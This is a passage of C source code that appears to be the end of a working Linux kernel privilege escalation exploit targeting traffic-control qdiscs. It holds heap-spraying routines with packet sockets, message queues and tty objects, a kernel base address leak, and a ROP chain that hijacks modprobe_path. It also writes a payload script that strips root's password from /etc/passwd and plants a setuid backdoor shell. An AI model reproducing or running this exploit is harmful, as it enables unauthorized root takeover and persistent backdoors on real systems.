    spray_socks_corruptable[i] = socket(PF_PACKET, SOCK_DGRAM, 0);
    if (spray_socks_corruptable[i] < 0) {
      perror("PF_PACKET spray");
      exit(-1);
    }
  }
  // Release, hopefully the qdisc will land somewhere in here
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    close(spray_socks_corruptable[i]);
  }
  printf("[!] Trying to add a child qdisc fo an xtra read....\n");
  // Parent of 1:1
  // g_parent = ;
  int parent_hnd = (1 << 16) | 1;
  create_qdisc(sock_fd, idx, &dest_addr, 2, parent_hnd);
  sleep(1);
  close(sock_fd);
  // Need to reset the socket state here otherwise it fucks up the quant leak
  // we get...
  sock_fd = setup_rtnet(&src_addr, &dest_addr);
  // g_handle = 2;
  //    Gets us a leak from the current kmalloc 2k cache
  uint32_t quant1 = get_quant(sock_fd, idx, &dest_addr, 0, 2, TC_H_ROOT);

  // Fill in the holes hopefully adjacent to the child qisc and thus in range
  // of the leaks.
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    //  No worky, need better objects
    spray_socks_corruptable[i] = socket(PF_PACKET, SOCK_DGRAM, 0);
    if (spray_socks_corruptable[i] < 0) {
      perror("PF_PACKET spray");
      exit(-1);
    }
  }

  printf("[!] Deleting qdisc child...");

  del_qdisc(sock_fd, idx, &dest_addr, 2);
  // Dont think we *need* 10 seconds, but reliability and stuff
  sleep(10);
  // sleep(6);
  uint64_t sock_target = (quant1 - 0x180 + (0x800 * 2));

  printf("[*] Socket hopefully: 0x%lx\n", sock_target);
  printf("[*] skc_prot: 0x%lx\n", sock_target + 0x28);

  sock_to_use = sock_fd;
  dst_addr_glb = &dest_addr;
  do_ptr_write(idx, sock_target + 0x28 - (0x800), 1, sock_fd, &dest_addr);

  printf("[*] Releasing QDISC a second time lol...\n");

  del_qdisc(sock_fd, idx, &dest_addr, 1);
  sleep(10);
  // sleep(6);
  close(sock_fd);

  // HERE WE ALSO NEED TO DO THE STEPS FOR CROSS CACHE AGAIN...

  // Now start freeing moar shit.
  // Free one obj per slab to overflow partial list
  for (int i = 0; i < TOTAL_ALLOC; i += OBJ_PER_SLAB) {
    close(junk[i]);
  }

  for (int i = 0; i < PRE + POST; i++) {
    close(pre_post[i]);
  }

  for (int i = 0; i < TOTAL_ALLOC; i++) {
    close(junk[i]);
  }

  // MASSIVE reliability improvement
  sleep(3);
  // Shouldve discarded slab, now need to check.

  // Try to reclaim with sockets
  printf("[!] Starting le big spray again...\n");
  int new_spray_sz = 0x400 - MSGSZ;
  memset(msg1, 'V', new_spray_sz);
  *(uint64_t *)(&msg1[0x180 - 0x30]) = 0;

  // Now we need to try to evict the page from the percpu freelist.
  // Hopefully at this point we can get the page back in rotation.
  release_slabs(evict_slabs_p, ev_pre_post_ptr, EVICT_N, PRE, POST);

  sleep(2);

  // Need to be able to identify each msg
  {
    int msgsz = new_spray_sz;
    char *msgtxt = msg1;
    int spray_n = MSG_SPRAY * 2;
    int *qstore = qid1;
    int qidn = 0;
    int ret = -1;
    socklen_t len = 0;
    char mbuf[msgsz + MSGSZ];
    struct msgbuf *msg = (struct msgbuf *)mbuf;
    msgsz -= (MSGSZ);
    memcpy(msg->mtext, msgtxt, msgsz);
    for (int j = 0; j < spray_n; j++) {
      msg->mtype = MSG_SPRAY + j + 1;
      qidn = qstore[j];
      *(uint64_t *)(&msg->mtext[0x188 - 0x30]) = MSG_SPRAY + j + 1;
      if (msgsnd(qidn, msg, msgsz, 0) < 0) {
        printf("j: %d\tqid: %d\tmsgsz: 0x%x\n", j, qidn, msgsz);
        perror("msgsnd lol");
        exit(-1);
      }
    }
  }

  printf("[!] Receiving...");
  char *mrecv1 = recv_msg_CPY(qid[i], NEWCOMPSZ, 1, 0);
  uint64_t seg_idx = *(uint64_t *)(&mrecv1[MSGMSGSZ + 8]);

  printf("[*] Controlled seg idx: 0x%lx -> 0x%lx\n", seg_idx,
         seg_idx - (MSG_SPRAY + 1));

  seg_idx -= (MSG_SPRAY + 1);
  free(mrecv1);
  mrecv1 = recv_msg(qid1[seg_idx], new_spray_sz, 0, 0);
  dumph(mrecv1, 0x10, ' ');
  free(mrecv1);

  // Need moar raaaagh
  int spray_socks[0x200 - 4 - 1 + 0x50];
  for (int i = 0; i < sizeof(spray_socks) / sizeof(spray_socks[0]); i++) {
    if ((spray_socks[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY)) <= 2) {
      printf("i: %d\n", i);
      perror("tty_struct spray open");
      exit(-1);
    }
  }

  mrecv1 = recv_msg_CPY(qid[i], NEWCOMPSZ, 1, 0);
  const int subtract = (5 * 0x10) - 8;
  dumph(&mrecv1[NEWCOMPSZ - (subtract)], subtract, ' ');
  uint64_t do_tty_hangup = *(uint64_t *)(&mrecv1[NEWCOMPSZ - (subtract)]);
  kbase = do_tty_hangup - 0xadde80;
  printf("[*] Kbase: %p\n", kbase);
  free(mrecv1);

  // Need to do this so we can reclaim the tty_spray objects and abuse the
  // fact that we have written a second ptr.
  for (int i = 0; i < sizeof(spray_socks) / sizeof(spray_socks[0]); i++) {
    close(spray_socks[i]);
  }

  sleep(2);

  // Rellocate AFTER the leaks.
  {
    new_spray_sz = 0x400 - MSGSZ;
    int msgsz = new_spray_sz;
    memset(msg1, 'B', new_spray_sz);

    char *msgtxt = msg1;
    int spray_n = MSG_SPRAY * 2;
    int *qstore = qid1;
    int ret = -1;
    socklen_t len = 0;
    char mbuf[msgsz + MSGSZ];
    const uint64_t mov_rsp_rax_pop_rbx_ret = kbase + 0xf95cc;
    const uint64_t pivgdg = mov_rsp_rax_pop_rbx_ret;
    const uint64_t modprobe = kbase + 0x295eb30;
    const uint64_t mov_qword_ptr_rsi_rdx_pop_rbx_ret = kbase + 0xe4fdb2;
    const uint64_t pop_rsi_ret = kbase + 0x1518;
    const uint64_t pop_rdx_ret = kbase + 0x173942;
    uint64_t user_pc = (uint64_t)&retfunc;
    // const uint64_t swapgs_return_to_usermode = kbase + 0x1401265;
    // const uint64_t swapgs_return_to_usermode = kbase + 0x140118b;
    const uint64_t swapgs_return_to_usermode = kbase + 0x1401126;
    struct msgbuf *msg = (struct msgbuf *)mbuf;
    msgsz -= (MSGSZ);
    memset(msg->mtext, 0, msgsz);
    memcpy(msg->mtext, msgtxt, msgsz);
    msg->mtype = 1;
    *(uint32_t *)(&msg->mtext[216]) = 0;
    *(uint32_t *)(&msg->mtext[0x228]) = 0;
    *(uint64_t *)(&msg->mtext[160]) = 0x4142434445464748;
    *(uint64_t *)(&msg->mtext[0x1f0]) = pivgdg;
    uint32_t write = (0x188 - 0x30) / 8;
    uint64_t *mptr = (uint64_t *)(&msg->mtext[0]);
    mptr[write++] = pop_rsi_ret;
    mptr[write++] = modprobe;
    mptr[write++] = pop_rdx_ret;
    // /tmp/ex\x00
    mptr[write++] = 0x0078652f706d742f;
    // Should hopefully skip raw_prot ptr in our payload.
    mptr[write++] = mov_qword_ptr_rsi_rdx_pop_rbx_ret;
    // Skip raw_prot
    write++;
    // Should be doing swapgs; ... iretq
    mptr[write++] = swapgs_return_to_usermode;
    // Now the arg arrangements for iretq
    mptr[write++] = 0x7777777777777777;
    mptr[write++] = 0x7777777777777777;
    mptr[write++] = user_pc;
    mptr[write++] = user_cs;
    mptr[write++] = user_rflags;
    mptr[write++] = user_sp;
    mptr[write++] = user_ss;
    // Random padding
    mptr[write++] = 0x7777777777777777;
    for (int i = 0; i < spray_n; i++) {
      if (msgsnd(qstore[i], msg, msgsz, 0) < 0) {
        printf("i: %d\tsz: 0x%x\n", i, msgsz);
        perror("msgsnd lol");
        ret = -1;
        // exit(-1);
        break;
      }
    }
  }

  // One of these will (please) trigger packet_ops->release_cb and start our
  // ropchain.
  for (int i = 0;
       i < sizeof(spray_socks_corruptable) / sizeof(spray_socks_corruptable[0]);
       i++) {
    close(spray_socks_corruptable[i]);
  }
  return;
}

void setup_ns_stuff() {
  setup_namespace();
  // make_net_ns();
}

// This is a rlly rlly silly script huh
// const char mprobe_scr[] = "#!/bin/sh\nwhoami\necho \"ERM\" > /eggsdee";
const char mprobe_scr[] =
    "#!/bin/sh\nsed -i -e 's/root:x:/root::/g' /etc/passwd\necho "
    "'#!/bin/sh\\necho \"HIIII\"\\n/bin/sh' > /backdoor.sh\nchmod root:root "
    "/backdoor.sh; chmod "
    "4777 /backdoor.sh";

int main() {

  int idx = if_nametoindex("eth0");
  if (!idx) {
    perror("if_nametoindex ");
  }
  printf("eth0 idx: %d\n", idx);

  // Write evil shell script
  int f = open("/tmp/ex", O_CREAT | O_RDWR, S_IRWXU);
  if (f < 0) {
    perror("open mprobe scr");
    return -1;
  }
  write(f, mprobe_scr, sizeof(mprobe_scr));
  close(f);

  // Save registers for when we return from kernel mode
  save_state();

  setup_ns_stuff();

  do_exp();
  return 0;
}